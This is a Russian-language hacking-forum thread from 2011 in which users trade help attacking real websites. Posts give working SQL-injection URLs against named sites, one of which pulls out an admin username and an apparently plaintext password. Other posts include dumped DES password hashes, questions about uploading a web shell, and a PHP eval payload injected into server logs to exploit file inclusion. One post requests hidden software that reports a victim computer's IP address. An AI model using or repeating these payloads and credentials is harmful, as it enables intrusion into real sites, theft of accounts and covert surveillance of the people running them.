22.01.2011, 02:09
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094
Репутация:
672
|
|
Сообщение от noviyuser
загрузил файл /etc/passwd через sql injection
(и дальше наподобие)
#login
ass:1002:65533::0:0::/var/www/xxx.xxx.com:/usr/local/bin/bash
#login1
ass1:1000:1000::0:0:user1:/home/alx:/sbin/nologin
получается login и pass от домена xxx.xxx.com/admin ?
blabla:*:1001:65533:ftp-access to xxx.xxx.net:/var/www/xxx.xxx.net/docs:/sbin/nologin
а это что значит? какие еще значения можно загрузить через load file() имею ввиду конфигурационные файлы
блин, и сколько будет продолжатся античатопедия?
никакого пароля там нет, мб лучше немного изучать никсы?
структура /etc/passwd
usernameassword(пусто):uid:gid:comments:home dir:shell
|
|
|
22.01.2011, 02:32
|
|
Новичок
Регистрация: 21.06.2005
Сообщений: 1
Провел на форуме:
0
Репутация:
0
|
|
есть ли прога которой можно сдампить много баз? а то sqli helper и mysqli dumper по одной базе приходиться дампить
|
|
|
|
22.01.2011, 02:55
|
|
Новичок
Регистрация: 12.05.2010
Сообщений: 2
Провел на форуме:
33215
Репутация:
0
|
|
Почему таким запросом находит кол-во полей
Сообщение от None
http://www.dknews.kz/article.php?id=4353&archid=115+group+by+5+--+
А при нахождении выводного поля получается всегда ошибка?
Сообщение от None
http://www.dknews.kz/article.php?id=4353&archid=115+and+1=0+union+selec t+1,2,3,4,5--+
|
|
|
|
22.01.2011, 04:19
|
|
Участник форума
Регистрация: 25.11.2009
Сообщений: 201
Провел на форуме:
866555
Репутация:
226
|
|
http://www.dknews.kz/article.php?id=4353+and+1=2+union+select+version() ,2222,3333+--+
смотри тайтл
З.Ы. а если хочешь понять почему в твоём варианте не отображало, то попробуй написать http://www.dknews.kz/article.php?id=4353&archid=115+and+1=0+union+selec t+11111,2222,3333,4444,5555--+ и увидишь "Архивные данные за 22 Января 3333 года"
|
|
|
|
22.01.2011, 22:30
|
|
Новичок
Регистрация: 12.05.2010
Сообщений: 2
Провел на форуме:
33215
Репутация:
0
|
|
Достал из БД 5.0.51a-24+lenny2-log пароль admina подскажите какой алгоритм шифрования?
admin:adhEqiFPgCuTo
noname:notE52y2N6MfM
|
|
|
|
22.01.2011, 23:03
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094
Репутация:
672
|
|
Сообщение от Skipp
Достал из БД
5.0.51a-24+lenny2-log
пароль admina подскажите какой алгоритм шифрования?
admin:adhEqiFPgCuTo
noname:notE52y2N6MfM
DES(UNIX)
читаем /thread155032.html
|
|
|
|
23.01.2011, 13:48
|
|
Познавший АНТИЧАТ
Регистрация: 12.07.2010
Сообщений: 1,546
Провел на форуме:
344922
Репутация:
75
|
|
подскажите как тут http://redbox.sg/products.php?cat_id=-61+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,1 5,16,17,18-- залить шелл, пробовал как написано в статьях и ничего не получается
|
|
|
|
23.01.2011, 14:42
|
|
Познающий
Регистрация: 31.01.2007
Сообщений: 88
Провел на форуме:
631013
Репутация:
453
|
|
Код:
http://redbox.sg/products.php ?cat_id=-61+union+select+1,2,3,concat(user_name,0x3a,password),5,6,7,8,9,10,11,12,13,14,15,16,17,18 from user--
redbox_admin:hooyinting
Ищешь админку, заливаешь шелл) |
|
|
|
24.01.2011, 01:22
|
|
Новичок
Регистрация: 14.11.2009
Сообщений: 2
Провел на форуме:
7499
Репутация:
0
|
|
Помогите пожалуйста раскрутить LFI!
Вариант с /proc/self/environ не прокатывает, ибо FreeBSD. Отыскал место хранения логов error_log и access_log. Прочитал все что нашел по LFI, в том числе статью уважаемого Expl0ited'a, но никак пока не получается. Отправляю запрос подключившись через телнет вида:
POST http://site.com/epicfaaaaaail.php HTTP/1.1
Смотрю в access_log:
[23/Jan/2011:12:33:40 -0800] "POST http://site.com/epicfaaaaaail.php
Parse error: syntax error, unexpected $end in /usr/local/apache/logs/site.com-access_log(139780) : eval()'d code on line 1
HTTP/1.1" 404 219
Отправляю по другому:
GET / HTTP/1.1
А там:
[23/Jan/2011:12:25:19 -0800] POST / HTTP/1.1" 200 5346
Третий сделал как в статье:
GET http://site.com/epicfaaaaaail.php?%3C%3Fphp+eval%28%24_GET%5Bcmd%5 D%29%3F%3E HTTP/1.1
В логе:
[23/Jan/2011:12:25:19 -0800] "GET http://site.com/epicfaaaaaail.php?%3C%3Fphp+eval%28%24_GET%5Bcmd%5 D%29%3F%3E HTTP/1.1 " 404 215
И еще стопиццотыщ вариантов...
В итоге не access_log&cmd=ls, не access_log&cmd=phpinfo(); не работают...
Что можно еще применить? |
|
|
|
24.01.2011, 01:54
|
|
Постоянный
Регистрация: 19.09.2008
Сообщений: 511
Провел на форуме:
1866685
Репутация:
340
|
|
Что можете подсказать для того что бы при каждой смене IP на удаленном компьютере. Мне на хостинг (а лучше е-мейл) приходил отчет о том под каким IP сейчас работает ПК.
Естественно надо что бы пользователь удаленной машины не знал об этом.
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
